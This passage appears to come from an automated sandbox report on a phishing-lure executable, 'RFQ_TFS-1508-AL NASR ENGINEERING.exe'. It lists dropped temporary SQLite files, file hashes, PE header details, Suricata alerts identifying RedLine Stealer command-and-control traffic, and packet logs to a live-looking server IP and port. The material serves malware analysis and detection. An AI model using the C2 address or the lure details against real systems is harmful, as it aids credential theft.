                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpD88F.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpE9B1.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpE9D1.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpE9E1.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpE9F2.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpEA03.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpEA13.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpEA24.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpEA44.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpFCD.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpFDE.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpFEE.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                          Category:dropped
                                                                                          Size (bytes):1835008
                                                                                          Entropy (8bit):4.421881130653811
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:CSvfpi6ceLP/9skLmb0OTuWSPHaJG8nAgeMZMMhA2fX4WABlEnNt0uhiTw:RvloTuW+EZMM6DFyT03w
                                                                                          MD5:F65C62DAC893E859E0E0A3425BBCF3E0
                                                                                          SHA1:B3D112CA4B59F432496A8FB6F7B1194537BC0A31
                                                                                          SHA-256:38BC0E5597BEC50BDF1E0FD95882AA61F976D50508B947D065FAA2790BBEA681
                                                                                          SHA-512:4E8AF993F744768C7CDAC3EFB3863ED46A96EE9FE25D49B9017CDDCF59496CACB7BD0D0F75B472D9042246EAEFBA84F1159B9A017CBFC91C7269B1886208A22B
                                                                                          Malicious:false
                                                                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmV....9..............................................................................................................................................................................................................................................................................................................................................'y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):4.149547776787964
                                                                                          TrID:
                                                                                          • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                          • Win64 Executable GUI (202006/5) 46.43%
                                                                                          • Win64 Executable (generic) (12005/4) 2.76%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                          • DOS Executable Generic (2002/1) 0.46%
                                                                                          File name:RFQ_TFS-1508-AL NASR ENGINEERING.exe
                                                                                          File size:2'875'465 bytes
                                                                                          MD5:51e2a4cf52a06bff7b50826173d6a0ad
                                                                                          SHA1:d5450d3259df08a3d0c0a0b91b586e8532fab2e0
                                                                                          SHA256:7087a8601eecc0ad79246fe0eb6cb2e9562b510495281dfe4c6df888b2b22b43
                                                                                          SHA512:95151da1e94e93497e9786e5d6470573a4be00dba4f1d8228541c802cc57d9da2cdd13c1a0819a7e30673385fe863469bf0997d8e5405f2a5014a912229d4efa
                                                                                          SSDEEP:12288:GVfHSQAvvch1+6XDR/o9hcOPsBwlJgymOvujooTjaV:GZZAvvch06zNo9hcIlJljoTjaV
                                                                                          TLSH:74D51239B2531E6BFD2905B6C8D635F052FE1DA33AF18A2FDF19AD08598613D04B1871
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....a..........."...0.X&............... ....@...... ....................................`................................

                                                                                          File Icon

                                                                                          Icon Hash:00928e8e8686b000

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x400000
                                                                                          Entrypoint Section:
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x916198D0 [Wed Apr 17 05:40:32 2047 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          dec ebp
                                                                                          pop edx
                                                                                          nop
                                                                                          add byte ptr [ebx], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax+eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x5a6.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x463c0x1c.text
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000x26580x28007607faacd2bdf2fcc21ebaac63b124caFalse0.543359375data5.706222813860211IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x60000x5a60x6009a9b1eb281957316b1b1779ad352807fFalse0.4147135416666667data4.056084266397839IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_VERSION0x60a00x31cdata0.4296482412060301
                                                                                          RT_MANIFEST0x63bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-11-18T17:34:02.747716+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.549704193.70.111.18613484TCP
                                                                                          2024-11-18T17:34:08.091098+01002045000ET MALWARE RedLine Stealer - CheckConnect Response1193.70.111.18613484192.168.2.549704TCP
                                                                                          2024-11-18T17:34:08.431819+01002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.549704193.70.111.18613484TCP
                                                                                          2024-11-18T17:34:11.786245+01002045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound1193.70.111.18613484192.168.2.549704TCP
                                                                                          2024-11-18T17:34:11.786245+01002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1193.70.111.18613484192.168.2.549704TCP
                                                                                          2024-11-18T17:34:12.872627+01002849352ETPRO MALWARE RedLine - SetEnvironment Request1192.168.2.549714193.70.111.18613484TCP
                                                                                          2024-11-18T17:34:14.203778+01002848200ETPRO MALWARE RedLine - GetUpdates Request1192.168.2.549717193.70.111.18613484TCP

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 18, 2024 17:34:01.840709925 CET4970413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:01.846985102 CET1348449704193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:01.847074986 CET4970413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:01.866641045 CET4970413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:01.871848106 CET1348449704193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:02.216644049 CET4970413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:02.221813917 CET1348449704193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:02.693150043 CET1348449704193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:02.747715950 CET4970413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:07.762092113 CET4970413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:07.762093067 CET4970413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:08.076047897 CET4970413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:08.091098070 CET1348449704193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:08.091116905 CET1348449704193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:08.091130018 CET1348449704193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:08.431598902 CET1348449704193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:08.431638002 CET1348449704193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:08.431649923 CET1348449704193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:08.431657076 CET1348449704193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:08.431818962 CET4970413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:11.780792952 CET4970413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:11.781157017 CET4971413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:11.786245108 CET1348449704193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.786314011 CET4970413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:11.786685944 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.786747932 CET4971413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:11.786926985 CET4971413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:11.786986113 CET4971413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:11.792069912 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.792083979 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.792093039 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.792103052 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.792110920 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.792119980 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.792126894 CET4971413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:11.792131901 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.792141914 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.792176008 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.792179108 CET4971413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:11.792200089 CET4971413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:11.792215109 CET4971413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:11.792300940 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.792347908 CET4971413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:11.797350883 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.797365904 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.797374964 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.797384977 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.797396898 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.797405958 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:11.797408104 CET4971413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:11.797436953 CET4971413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:11.845139980 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:12.825676918 CET1348449714193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:12.827007055 CET4971713484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:12.831980944 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:12.832060099 CET4971713484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:12.832226992 CET4971713484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:12.837382078 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:12.872627020 CET4971413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:13.185286045 CET4971713484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:13.190232992 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.190246105 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.190254927 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.190269947 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.190291882 CET4971713484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:13.190329075 CET4971713484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:13.190381050 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.190423012 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.190433025 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.190443039 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.190455914 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.190469980 CET4971713484192.168.2.5193.70.111.186
